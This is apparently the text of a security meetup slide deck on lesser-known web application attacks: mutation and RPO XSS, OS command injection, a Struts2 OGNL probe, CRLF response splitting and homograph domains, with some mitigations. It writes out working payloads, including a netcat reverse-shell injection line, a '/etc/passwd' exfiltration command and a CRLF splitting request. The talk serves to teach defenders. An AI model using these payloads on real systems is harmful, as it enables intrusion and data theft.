Upload
nullowaspmumbai
View
186
Download
0
Embed Size (px)
Citation preview
Lesser Known WebAppAttacks
About me Consultant at Aujas Networks
Part time bug hunter
Individual Security researcher
Blogger
http://infinite8security.blogspot.in
Lesser Known WebAppAttacks
Menu Card
Cross site scripting –
Mutation XSS
RPO XSS
Zombie XSS
Remote Command Execution
CR-LF Attack
Homograph Attack
Lesser Known WebAppAttacks
HTML encoded payload
<listing><img src=1 onerror=alert(1)></listing>
we will put this piece of code into another code using innerHTML
property.
<listing id=x><img src=1 onerror=alert(1)></listing>
<script>alert(document.getElementById('x').innerHTML)</script>
When this code will execute, browser will read innerHTML and call
document.getElementById(‘x’)
Resulting in multiple level of decoding and mutate from safe to
unsafe state.
Lesser Known WebAppAttacks
Mitigation:
Server-side mitigation
• Avoiding outputting server content otherwise
incorrectly converted by the browser.
• The flawed content should be replaced with
semantically equivalent content which is converted
properly by the browser.
Client-side mitigation
• Browsers should implement ECMA Script 5 and higher.
• TrueHTML: TrueHTML relies on the XMLSerializer DOM
object provided by all of the user agents.
• https://cure53.de/fp170.pdf
Lesser Known WebAppAttacks
Cross site Scripting-RPO XSS
Relative path Overwrite xss
• Difference between Absolute and Relative url
• Absolute URL: https://thehacker.co.in/test
• Relative URL: test/some_subdirectory
To exploit this findings three things are necessary,
1) stored XSS that allows CSS injection.
2) URL Rewriting.
3) Relative addressing to CSS style sheet.
Lesser Known WebAppAttacks
DEMO
• Step 1: Lets visit
www.webdevelopersnotes.com/graphics/index.php3
• To check URL re-writing add ‘/’
• Open re-writed url with xss payloadin IE
and see the Magic ;)
• http://challenge.hackvertor.co.uk/
xss_horror_show/chapter7/rpo.php/
Mitigation:• It is recommended that absolute URLs should be used
throughout a site.
• Otherwise relative root url should be used.
www.nsa.gov && nc -vn 192.168.254.128 4444 -e /bin/bash
Remote/OS Command Execution
Lesser Known WebAppAttacks
Lesser Known WebAppAttacks
Now what if ( ; ) is blocked by the application?
X ; Y = Seperating Commands (Run X and
then Y, regardless of success of X)
X | Y = PIPE (Run X and pass output of X to Y)
X ^ Y = PIPEZ
X && Y = AND (Run Y if X succeeded )
FAIL || Y = OR (Run Y if X failed)
X %0D Y %0D Z = OR
` X ` = Backtick
` X & Y ` = Background (Run Y and then run X in
background, regardless of success of X)
$( command )
nc -e /bin/sh = Netcat
wget --post-file /etc/passwd = WGET
Lesser Known WebAppAttacks
RCE never dies!!!
• "action:", "redirect:" or "redirectAction:" is not
properly sanitized.
• information will be evaluated as OGNL (Object-Graph
Navigation Language) expression against the value stack,
this introduces the possibility to inject server side code.
Apache struts2 RCE
http://host/struts2-
blank/example/X.action?action:${3*4}
Lesser Known WebAppAttacks
Divide and Conquer cR-LF Attack
• CR stands for Carriage Return (CR, ASCII 13, \r)
• LF stands for Line feed (LF, ASCII 10, \n)
How this Attack work?
The server script embeds user data in HTTP response headers.
Example: Step1: There is redirection page “redir_lang.jsp”
When we hit index page server responds with following response
<% response.sendRedirect("/by_lang.jsp?lang="+
request.getParameter("lang")); %>
Lesser Known WebAppAttacks
Lets Attack ;)
Step 3: Instead of passing value as English. Lets pass our attack
vector as shown.
/redir_lang.jsp?lang=foobar%0d%0aContentLength
:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCont
entType:%20text/html%0d%0aContentLength:%2019%
0d%0a%0d%0a<html>Shazam</html>
Note: We have URL encoded the CRLF sequences
Lets see what server responds with
Lesser Known WebAppAttacks
A first HTTP response, which
is a 302 (redirection)
response.
A second HTTP response, which is a 200 response, with a content comprising
of 19 bytes of HTML.
Superfluous data
So when the attacker feeds the target with two requests, the first
being to the URL/redir_lang.jsp?lang=foobar%0d%0aContentLength:%200%0d%0a%0d%
0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aCont
entLength:%2019%0d%0a%0d%0a<html>Shazam</html>
And the second to the URL > /index.html
The target would believe that the first request is matched to the
first response:
And the second request (to /index.html) is matched to the second
response:
Lesser Known WebAppAttacks
What Attacker can do by
CRLF attack?
Cross site scripting >>
http://blog.innerht.ml/twitter-crlf-injection
Web Cache Poisoning (defacement)
Cross User attacks (single user, single page, temporary
defacement)
Hijacking pages with user-specific information
Browser cache poisoning
Lesser Known WebAppAttacks
Lesser Known WebAppAttacks
Homograph Attack
Can you tell the difference?
1) https://ebаy.com/
2) https://ebay.com/
Lesser Known WebAppAttacks
What is this all about?http://ebаy.com/
Decoding to punycode
http://xn--eby-7cd.com/
Cyrillic alphabets
Lesser Known WebAppAttacks
What Attacker can do by
Homograph attack?
Phishing
Un-validated Redirection
Fake websites
Attacker may combine this with SSL attacks
http://www.blackhat.com/presentations/bh-dc-
09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf
Thank You
Reach me @
LinkedIn: Ninad Sarang
Twitter: @hbkninad